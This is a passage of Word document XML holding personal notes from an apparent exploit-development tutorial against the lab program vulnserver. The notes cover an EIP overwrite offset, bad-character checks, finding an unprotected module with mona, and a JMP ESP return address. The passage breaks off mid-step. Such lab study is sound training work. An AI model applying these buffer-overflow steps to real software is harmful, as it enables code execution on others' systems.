        <w:t>pattern_offset.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0034443E">
        <w:t xml:space="preserve">, byte 2004 is where the EIP starts, so 2003 + 4 B’s. </w:t>
      </w:r>
      <w:r w:rsidR="0037374A">
        <w:t>We should see 42424242 on the EIP when we overwrite it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AE2A7" w14:textId="38355EAA" w:rsidR="00C05DB0" w:rsidRDefault="00C05DB0">
      <w:r>
        <w:t>Shellcode = “A” * 2003 + “B” * 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB75734" w14:textId="72D719D3" w:rsidR="00C05DB0" w:rsidRDefault="0053766A" w:rsidP="00C05DB0">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i1.wp.com/tcm-sec.com/wp-content/uploads/2019/05/13.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41069F40" wp14:editId="36182DCC">
            <wp:extent cx="5943600" cy="2876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r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A8EB1" w14:textId="53F865EB" w:rsidR="008A6A4C" w:rsidRDefault="008A6A4C"/>
    <w:p w14:paraId="7B6AC282" w14:textId="6F2EBC65" w:rsidR="00F97070" w:rsidRDefault="00F97070">
      <w:r>
        <w:t xml:space="preserve">Run the script! It should break the program. </w:t>
      </w:r>
      <w:r w:rsidR="00BD1449">
        <w:t xml:space="preserve">We see the EAX, went through, good, EBP, 41414141, Also A’s good. EIP is 42424242 </w:t>
      </w:r>
      <w:r w:rsidR="00BD1449">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00BD1449">
        <w:t xml:space="preserve"> We only sent 4 bytes of B’s and they all landed on EIP, so we now control the EIP!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE6B85" w14:textId="514B3FB6" w:rsidR="00BD1449" w:rsidRDefault="00BD1449">
      <w:r>
        <w:t>Smooth sailing from here, just small housekeeping things we have to do (bad characters, modules), then generate shellcode, point EIP instead to that return address that will be malicious, then gain root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8141D" w14:textId="5288850F" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="5A657933" w14:textId="01E770D3" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="26DFF338" w14:textId="78827765" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="402B5C8C" w14:textId="5A8A2E44" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="021DC484" w14:textId="4B08BF50" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="29A04538" w14:textId="048C4812" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="14B57C09" w14:textId="1164202B" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="4932BC41" w14:textId="3A6CF104" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="0066F369" w14:textId="0894A52A" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="080BF319" w14:textId="071CC609" w:rsidR="001C4027" w:rsidRDefault="001C4027"/>
    <w:p w14:paraId="75E60887" w14:textId="77777777" w:rsidR="00E31133" w:rsidRDefault="00E31133"/>
    <w:p w14:paraId="26D1A76A" w14:textId="2A9E4DF3" w:rsidR="008E2615" w:rsidRDefault="008E2615" w:rsidP="008E2615">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FINDING BAD CHARACTERS</w:t>
      </w:r>
      <w:r w:rsidR="00B568F4">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16211C27" w14:textId="50AD6506" w:rsidR="00B568F4" w:rsidRDefault="00B568F4" w:rsidP="008E2615">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(NOTE THEM FOR WHEN YOU NEED TO WRITE THE SHELLCODE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D8E8B9" w14:textId="6664DF17" w:rsidR="001C4027" w:rsidRDefault="001C4027"/>
    <w:p w14:paraId="6E43CDC8" w14:textId="3F7A91B6" w:rsidR="001C4027" w:rsidRDefault="00043152">
      <w:r>
        <w:t>Generating shellcode, we need to know what characters are good for the shellcode and what are bad for the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34D9B1" w14:textId="372A3301" w:rsidR="00043152" w:rsidRDefault="00043152">
      <w:r>
        <w:t xml:space="preserve">To do that, run all the hex characters through our program and see if any of our program act up. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F38254" w14:textId="48844474" w:rsidR="00043152" w:rsidRDefault="00043152">
      <w:r>
        <w:t xml:space="preserve">By default, NULL x00 act up. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542F694" w14:textId="44FA367A" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="4E08AE53" w14:textId="5A14B1E1" w:rsidR="00043152" w:rsidRDefault="00043152">
      <w:r>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66F8DAFB" w14:textId="16FF077C" w:rsidR="00043152" w:rsidRDefault="00043152">
      <w:r>
        <w:t xml:space="preserve">Copy and paste the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> variable, and edit the python script again to include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00690BBC">
        <w:t>, also add that to the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3955AB" w14:textId="74985184" w:rsidR="00690BBC" w:rsidRDefault="00043152">
      <w:r>
        <w:t>Delete \x00 because it’s default-bad</w:t>
      </w:r>
      <w:r w:rsidR="005F3F13">
        <w:t xml:space="preserve"> so we don’t even have to run it through our program</w:t>
      </w:r>
      <w:r w:rsidR="00690BBC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B081CF3" w14:textId="77777777" w:rsidR="00043152" w:rsidRDefault="00043152"/>
    <w:p w14:paraId="731D965C" w14:textId="1A4226C6" w:rsidR="00043152" w:rsidRDefault="00043152" w:rsidP="00043152">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i0.wp.com/tcm-sec.com/wp-content/uploads/2019/05/15.png?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C90DA7" wp14:editId="71E93278">
            <wp:extent cx="5943600" cy="1998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98980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C10FF33" w14:textId="2FCDBE06" w:rsidR="00043152" w:rsidRDefault="00CC739F">
      <w:r>
        <w:t>Run, check immunity debugger,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFB0E5" w14:textId="2CA145A9" w:rsidR="00CC739F" w:rsidRDefault="00CC739F">
      <w:r>
        <w:t xml:space="preserve">We’re interested in the hex dump, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA3432" w14:textId="21A240E4" w:rsidR="00CC739F" w:rsidRDefault="00CC739F">
      <w:r>
        <w:t xml:space="preserve">At the ESP, right click and say follow-in-dump. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A03767" w14:textId="527583D1" w:rsidR="00CC739F" w:rsidRDefault="00CC739F">
      <w:r>
        <w:t xml:space="preserve">To make it bigger </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> right click, appearance, OEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11B462" w14:textId="1320C40C" w:rsidR="00613C02" w:rsidRDefault="00613C02">
      <w:r>
        <w:t>Look at the hex dump, we sent x01, so we’re expecting 1-9, 0a, 0b, 0c, 0d, 0e, 0f, 10, 11, 12,13, 14,15, 16, 17, 18, etc. all the way to FF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DB089" w14:textId="68A45794" w:rsidR="00613C02" w:rsidRDefault="00613C02">
      <w:r>
        <w:t>We go through all and see if there’s anything out of place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC0AB0" w14:textId="5BE70570" w:rsidR="00B53EA6" w:rsidRDefault="00B53EA6">
      <w:r>
        <w:t>If you see 10, 11, 13, 14. Then it’s likely that 12 is a bad character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC7BE5" w14:textId="43A28BDF" w:rsidR="00973E47" w:rsidRDefault="00973E47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i1.wp.com/tcm-sec.com/wp-content/uploads/2019/05/18.jpg?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB57CFE" wp14:editId="457DF612">
            <wp:extent cx="1823156" cy="2154090"/>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0068" cy="2162257"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It’s identifying bad characters as B0, it’s not going to always be B0. I’m missing 04, 05, 25, 28, 29, etc. etc. etc.</w:t>
      </w:r>
      <w:r w:rsidR="006D31C9">
        <w:t xml:space="preserve"> Notate them all!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28807D4F" w14:textId="3C0AE49A" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FINDING THE RIGHT MODULE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64541305" w14:textId="77777777" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133"/>
    <w:p w14:paraId="4DDCBE61" w14:textId="0F7A24F4" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:r>
        <w:t>Looking for a DLL or something similar inside of a program that has no memory protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE86CCC" w14:textId="4BC9D118" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Dep, no ASLR. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> safe SCH, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18675F1C" w14:textId="7A8472C5" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133"/>
    <w:p w14:paraId="4633F204" w14:textId="4FE7AE49" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:r>
        <w:t>Tool that we can use with immunity debugger to achieve this. (Mona module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615F56C" w14:textId="1374EDFA" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133"/>
    <w:p w14:paraId="07DA5D13" w14:textId="666CBC6A" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:r>
        <w:t xml:space="preserve">Download mona.py on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>corelan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) and add it to the Immunity debugger path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485292A" w14:textId="1E6247E0" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B3CBBDC" wp14:editId="3C27D049">
            <wp:extent cx="5943600" cy="1668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04 at 5.52.3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68780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6C159F" w14:textId="3EDF352A" w:rsidR="00E31133" w:rsidRDefault="00E31133" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14075790" w14:textId="2D2AFB06" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Type in the bottom on the bottom of Immunity Debugger:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECD850" w14:textId="537883B4" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161728C" w14:textId="22743CC1" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604B6E0F" w14:textId="334A4704" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">That will pop information, and if you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can see these protection settings, False, True, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43932DA8" w14:textId="44DD31D5" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>We’re looking for False across the board</w:t>
      </w:r>
      <w:r w:rsidR="00342FAC">
        <w:t xml:space="preserve"> except for OS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00342FAC">
        <w:t>Dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E03DD8C" w14:textId="07D148C2" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We’re also looking for something </w:t>
      </w:r>
      <w:r w:rsidR="0053766A">
        <w:t>attached</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the vulnerable software itself (in this case, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA1EB0" w14:textId="19D6CB8D" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="0086612D">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i2.wp.com/tcm-sec.com/wp-content/uploads/2019/05/19.jpg?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D3D9141" wp14:editId="32125EDB">
            <wp:extent cx="6073422" cy="4037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b="70801"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6206812" cy="41260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9C0912E" w14:textId="370DDC4C" w:rsidR="005429F5" w:rsidRDefault="00586818" w:rsidP="00586818">
      <w:r>
        <w:t>Also make sure the BASE doesn’t contain bad characters in our case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C924F4" w14:textId="23E667E5" w:rsidR="00586818" w:rsidRDefault="00624F69" w:rsidP="00586818">
      <w:r>
        <w:t>They don’t ALL have to be false! OS DLL can be true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405DCCC5" w14:textId="69858764" w:rsidR="00586818" w:rsidRDefault="00586818" w:rsidP="00586818"/>
    <w:p w14:paraId="42A801C3" w14:textId="77777777" w:rsidR="00586818" w:rsidRDefault="00586818" w:rsidP="00586818"/>
    <w:p w14:paraId="43955CD1" w14:textId="358CC7ED" w:rsidR="005429F5" w:rsidRDefault="005429F5" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We don’t need to do this if we have it </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>writte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> already:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DA545" w14:textId="36BA45F2" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We need to also find the opcode equivalent of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231A20F8" w14:textId="7F0A6B5D" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go back to kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5C984" w14:textId="6BC0AD10" w:rsidR="0086612D" w:rsidRDefault="0086612D" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nasm_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59BC1CC5" w14:textId="3BEEB2A3" w:rsidR="0086612D" w:rsidRDefault="005429F5" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>/usr/share/Metasploit-framework/tools/exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nasm_shell.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F47FA32" w14:textId="0B664B88" w:rsidR="005429F5" w:rsidRDefault="005429F5" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA12CE5" w14:textId="4E74C4AC" w:rsidR="00675C12" w:rsidRDefault="005429F5" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will return</w:t>
      </w:r>
      <w:r w:rsidR="00675C12">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00675C12">
        <w:t>hexcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00675C12">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C5BF9" w14:textId="1637E29F" w:rsidR="005429F5" w:rsidRDefault="00675C12" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FFE4 </w:t>
      </w:r>
      <w:r w:rsidR="005429F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDACA0" w14:textId="36D45F2D" w:rsidR="00AD1C6C" w:rsidRDefault="00AD1C6C" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C540E4D" w14:textId="213E6937" w:rsidR="00AD1C6C" w:rsidRDefault="00AD1C6C" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Go into immunity, and type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72572511" w14:textId="51410DC1" w:rsidR="00AD1C6C" w:rsidRDefault="00AD1C6C" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-m for modules, then use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we see in the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839A417" w14:textId="54CC64A9" w:rsidR="00AD1C6C" w:rsidRDefault="00AD1C6C" w:rsidP="00E31133">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find -s “</w:t>
      </w:r>
      <w:r w:rsidR="00AF739C">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe4” -m essfunc.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F011A" w14:textId="43B99D47" w:rsidR="005D63F3" w:rsidRDefault="00AF739C" w:rsidP="00AF739C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Click enter. Looking for return addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE0D5F" w14:textId="687A89A4" w:rsidR="00AF739C" w:rsidRDefault="00AF739C" w:rsidP="00AF739C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506ADA63" w14:textId="1CFFE1E2" w:rsidR="00AF739C" w:rsidRDefault="0053766A" w:rsidP="00AF739C">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "https://i0.wp.com/tcm-sec.com/wp-content/uploads/2019/05/21.jpg?w=1080&amp;ssl=1" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F894AD5" wp14:editId="71089BE7">
            <wp:extent cx="594360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57655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32240B77" w14:textId="2BD8A8E7" w:rsidR="00AF739C" w:rsidRDefault="00AF739C" w:rsidP="00AF739C"/>
    <w:p w14:paraId="31D46323" w14:textId="3D79B505" w:rsidR="00AF739C" w:rsidRDefault="00AF739C" w:rsidP="00AF739C">
      <w:r>
        <w:t>Start at the top of that Results list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1170A5A9" w14:textId="05F6E074" w:rsidR="00AF739C" w:rsidRDefault="00AF739C" w:rsidP="00AF739C">
      <w:r>
        <w:t>Go into kali,  and edit the python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D8127" w14:textId="77777777" w:rsidR="00835A0B" w:rsidRDefault="00835A0B" w:rsidP="00AF739C"/>
    <w:p w14:paraId="42D39099" w14:textId="4F23D105" w:rsidR="00AF739C" w:rsidRDefault="00835A0B" w:rsidP="00835A0B">
      <w:r>
        <w:t>Return address first was 62</w:t>
      </w:r>
      <w:r w:rsidR="0053766A">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>011af (as we see in the screenshot)</w:t>
      </w:r>
      <w:r w:rsidR="00A7444A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8238AA" w14:textId="788ABCD3" w:rsidR="00A7444A" w:rsidRDefault="00A7444A" w:rsidP="00835A0B">
      <w:r>
        <w:t>We need to enter it in: \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xaf</w:t>
      </w:r>
